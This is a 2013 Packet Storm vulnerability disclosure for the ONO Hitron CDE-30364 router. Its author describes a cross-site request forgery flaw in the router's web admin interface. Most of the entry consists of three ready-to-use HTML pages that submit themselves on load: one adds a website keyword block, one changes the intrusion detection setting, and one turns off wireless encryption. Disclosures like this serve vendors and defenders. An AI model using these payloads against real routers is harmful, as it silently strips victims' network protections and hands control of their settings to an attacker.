Router ONO Hitron CDE-30364 Cross Site Request Forgery

2013-09-14T00:00:00
ID PACKETSTORM:123234
Type packetstorm
Reporter Matias Mingorance Svensson
Modified 2013-09-14T00:00:00

Description

                                        
                                            `# Exploit Title: Router ONO Hitron CDE-30364 - CSRF Vulnerability  
# Date: 14-9-2013  
# Exploit Author: Matias Mingorance Svensson - matias.ms[at]owasp.org  
# Vendor Homepage:  
http://www.ono.es/clientes/te-ayudamos/dudas/internet/equipos/hitron/hitron-cde-30364/  
# Tested on: Hitron Technologies CDE-30364  
# Version HW: 1A  
# Version SW: 3.1.0.8-ONO  
  
-----------------------------------------------------------------------------------------  
Introduction:  
-----------------------------------------------------------------------------------------  
Hitron Technologies CDE-30364 is a famous ONO Router using, also, a web  
management interface in order to set and change device parameters.  
  
The Hitron Technologies CDE-30364's web interface (listening on tcp/ip port  
80) is prone to CSRF vulnerabilities which allows to change router  
parameters and to perform many modifications to the router's parameters.  
The default ip adress of this adsl router, used for management purpose, is  
192.168.1.1.  
  
-----------------------------------------------------------------------------------------  
Exploit-1: Enable/Disable Web Site Blocking and add new Key Word/URL  
blocking(google in this case)  
-----------------------------------------------------------------------------------------  
<html>  
<body onload="javascript:document.forms[0].submit()">  
<H2></H2>  
<form method="POST" name="form0" action="  
http://192.168.1.1/goform/Keyword?file=parent-website&dir=admin  
%2F&checkboxName=on&blockingFlag=1&blockingAlertFlag=&cfKeyWord_Domain=&cfTrusted_MACAddress=&cfTrusted_MACAddress0=  
0&cfTrusted_MACAddress1=0&cfTrusted_MACAddress2=0&cfTrusted_MACAddress3=0&cfTrusted_MACAddress4=0&cfTrusted_MACAddre  
ss5=0&trustedMAC=&keyword0=google">  
</body>  
</html>  
  
-----------------------------------------------------------------------------------------  
Exploit-2: Enable/Disable Intrusion Detection System  
-----------------------------------------------------------------------------------------  
<html>  
<body onload="javascript:document.forms[0].submit()">  
<H2></H2>  
<form method="POST" name="form0" action="  
http://192.168.1.1/goform/Firewall?dir=admin%2F&file=feat-  
firewall&ids_mode=0&IntrusionDMode=on&rspToPing=1">  
</body>  
</html>  
  
-----------------------------------------------------------------------------------------  
Exploit-3: Disable(None) Wireless Security Mode  
-----------------------------------------------------------------------------------------  
<html>  
<body onload="javascript:document.forms[0].submit()">  
<H2></H2>  
<form method="POST" name="form0" action="  
http://192.168.1.1/goform/Wls?dir=admin  
%2F&file=wireless_e&key1=0000000000&key2=0000000000&key3=0000000000&key4=0000000000&k128_1=0000000000000000000000000  
0&k128_2=00000000000000000000000000&k128_3=00000000000000000000000000&k128_4=00000000000000000000000000&ssid_list=0&  
Encrypt_type=0">  
</body>  
</html>  
  
-----------------------------------------------------------------------------------------  
Many other changes can be performed.  
  
  
--   
Un saludo,  
Mat�as Mingorance Svensson  
*OWASP Foundation, Open Web Application Security Project*  
https://www.owasp.org  
http://es.linkedin.com/in/matiasms  
  
`